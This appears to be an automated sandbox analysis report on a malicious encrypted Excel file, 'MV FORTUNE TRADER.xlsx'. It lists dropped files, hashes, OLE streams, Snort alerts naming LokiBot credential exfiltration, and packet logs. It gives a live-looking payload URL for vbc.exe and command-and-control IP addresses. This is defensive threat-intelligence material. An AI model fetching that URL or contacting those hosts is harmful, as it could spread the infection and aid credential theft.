MD5:	2559B5B8D60DD663DF52D0570F5973A9
SHA1:	2AF0E521C34CF7EAAE8677E593900024FE0D16C9
SHA-256:	77EFE5A35F94F065B20860F7E446432D9C61FD6B139B1F4CD360A5A728F49410
SHA-512:	EAFD4ADD02278EE7C827A8EE21827D47ADCAFCA0D29F1CFAC2DE5DC6DDD734BA4C3B74A50DA6C977AF84DEC72498EE4642DA6328459AC659CA84C8CD5F69E669
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Reputation:	low
IE Cache URL:	http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.f...5...5...5.HP5...5.HA5...5.HF5...5..5...5...5...5.HO5...5.HW5...5.HQ5...5.HT5...5Rich...5........................PE..L....A.]............................@0............@.................................m0.............................. ...b...`}..<........v...........................................................................................................text...q........................... ..`.rdata..............................@..@.data....t.......(...\|..............@....rsrc....v.......x..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E4EC363.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83553F27.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	653280
Entropy (8bit):	2.898644879031968
Encrypted:	false
SSDEEP:	3072:+34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:Q4UcLe0JOqQQZR8MDdATCR3tS+jqcC
MD5:	84AAA60F0AF5E0EDDB2933443E1474CB
SHA1:	C7D60583C47D7751E5F8A979FCA6810B9773D0C1
SHA-256:	A29F496C4454E7504D57570F001E2104EFB668C350B5F86D9FE781FE071F3754
SHA-512:	3683B8E5412FE101E97153A37EB51E5B2F82D1EBEE2D39236EF369AA06F028F6B49DF0AB198017E73B41626F62E9D6F86E3A0D16B1D838DD316DB7747BA736B0
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................8................N.].....................N.]........ ....ylR........ ............zlR............................................X...%...7...................{ .@................C.a.l.i.b.r.............(...X............2eR.................{cR....,.......dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87860A6A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	111378
Entropy (8bit):	7.963743447431302
Encrypted:	false
SSDEEP:	3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
MD5:	5ACDB72AF63832D23CED937B6B976471
SHA1:	BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
SHA-256:	6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
SHA-512:	FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..\|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...\|.n\|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A79A1ACD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD4CBEFC.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	111378
Entropy (8bit):	7.963743447431302
Encrypted:	false
SSDEEP:	3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
MD5:	5ACDB72AF63832D23CED937B6B976471
SHA1:	BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
SHA-256:	6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
SHA-512:	FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..\|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...\|.n\|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .

C:\Users\user\AppData\Local\Temp\Cab75DC.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar75DD.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\132SWST2.txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	109
Entropy (8bit):	4.249081127682951
Encrypted:	false
SSDEEP:	3:GmM/U04EDzcpGGXUTUWQPC+KvjNf5jXcW6HOjSjXv:XM/UdEDwwGXUYXP6jfrnQOj2v
MD5:	9E9CCD2E7A37630AF52D8B1889355BDA
SHA1:	67D65974597F7AE414EF74B0D8B913F5071EF0F6
SHA-256:	768E6CE61429EBFD9DE25B66E85AA8BBB9E55B898B04E2581C72EF0941FFB604
SHA-512:	B960216C9A88615A7C7051441A7D5A799FB35E404539D49131E40580B959523C877E059DD9ADB2F239B665C67BA077DAE8B75E295867A35F1BE37866204B84F1
Malicious:	false
IE Cache URL:	cutt.ly/
Preview:	__cfduid.d87db188c203ff618989dc45e3896bc351613455365.cutt.ly/.9728.1351479424.30874556.2930565278.30868597.*.

C:\Users\user\Desktop\~$MV FORTUNE TRADER.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	269312
Entropy (8bit):	6.728521643538962
Encrypted:	false
SSDEEP:	6144:T1wUIRkrbJzmFuERDOm+dwclg+8Iy+8Cl9Tf6BxUemJ:T1ORkr1CFuERD9+yb+R8k9TS79mJ
MD5:	2559B5B8D60DD663DF52D0570F5973A9
SHA1:	2AF0E521C34CF7EAAE8677E593900024FE0D16C9
SHA-256:	77EFE5A35F94F065B20860F7E446432D9C61FD6B139B1F4CD360A5A728F49410
SHA-512:	EAFD4ADD02278EE7C827A8EE21827D47ADCAFCA0D29F1CFAC2DE5DC6DDD734BA4C3B74A50DA6C977AF84DEC72498EE4642DA6328459AC659CA84C8CD5F69E669
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.f...5...5...5.HP5...5.HA5...5.HF5...5..5...5...5...5.HO5...5.HW5...5.HQ5...5.HT5...5Rich...5........................PE..L....A.]............................@0............@.................................m0.............................. ...b...`}..<........v...........................................................................................................text...q........................... ..`.rdata..............................@..@.data....t.......(...\|..............@....rsrc....v.......x..................@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.996808233126403
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	MV FORTUNE TRADER.xlsx
File size:	2551296
MD5:	b9d2e20a706f5dccd80cbfca09685732
SHA1:	b3d2b8eaa620398c83ff203c3c705d03dad55288
SHA256:	132f5ce3c879259992351ae90865928ed508f5a76ab3f97ce6cd624ecccb551d
SHA512:	4c03476532bf33d64c42c9d2758ec1b55812869881586d83bd76b7f0887c2333cf0e71867fbe87cedaa6d985cc448612ce4e3df0a2a8dad177f5afe94faae66a
SSDEEP:	49152:U86IUlgkJPS53DdEjy8pZ9yrxkhhLIz1Q/1GxtK2qDW0Gq7FrdiiTRWuDchrj:510PSvGyIZUr6hxK1QMG2oW0rBicUB
File Content Preview:	........................>...................'...........................................................................................~...............z.......\|.......~...............z.......\|.......~...............z.......\|..............................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "MV FORTUNE TRADER.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2527480

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	2527480
Entropy:	7.99992623739
Base64 Encoded:	True
Data ASCII:	. . & . . . . . . ~ . . q g . . ' . . 7 . . . . . . . ! . . . 4 . . Y E . . . . 9 [ z _ . U . . . B . . . . 3 . . a . : . . . . h . . . ~ " . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . .
Data Raw:	e3 90 26 00 00 00 00 00 ab 7e 8b c3 71 67 c2 1d 27 fc e0 37 99 fd fa 1e 01 cf 04 21 2e 11 c0 34 ca b9 59 45 bc e4 11 1a 39 5b 7a 5f 84 55 fe f9 fb 42 9f 01 8a 2e 33 ad 94 61 ad 3a d8 a2 cc 0f 68 e5 c2 d2 7e 22 19 14 37 21 9b fe 8e 92 ff c7 85 94 83 af 10 1c 1a 09 37 21 9b fe 8e 92 ff c7 85 94 83 af 10 1c 1a 09 37 21 9b fe 8e 92 ff c7 85 94 83 af 10 1c 1a 09 37 21 9b fe 8e 92 ff c7

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.55378508921
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . V v . Y A . _ . l . 8 . . . ] . Q . . . . . % . > . . z / . . . . . . . l . . . . . . ' . . . E . . . J m . . . R . . b . . ? . . . .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/16/21-07:02:51.005730	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49168	80	192.168.2.22	185.208.180.121
02/16/21-07:02:51.005730	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49168	80	192.168.2.22	185.208.180.121
02/16/21-07:02:51.005730	TCP	2025381	ET TROJAN LokiBot Checkin	49168	80	192.168.2.22	185.208.180.121
02/16/21-07:02:51.005730	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49168	80	192.168.2.22	185.208.180.121

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 16, 2021 07:02:44.529942036 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:44.583849907 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:44.583988905 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:44.598814964 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:44.652445078 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:44.655513048 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:44.655586958 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:44.655622959 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:44.655729055 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:44.655764103 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:44.655770063 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:44.674331903 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:44.725692034 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:44.725754023 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:44.725884914 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:45.944720984 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:45.997760057 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:46.129453897 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:46.129514933 CET	443	49165	172.67.8.238	192.168.2.22
Feb 16, 2021 07:02:46.129683971 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:46.237684011 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.459585905 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.459723949 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.460187912 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.682566881 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.682643890 CET	80	49167	103.141.138.123	192.168.2.22
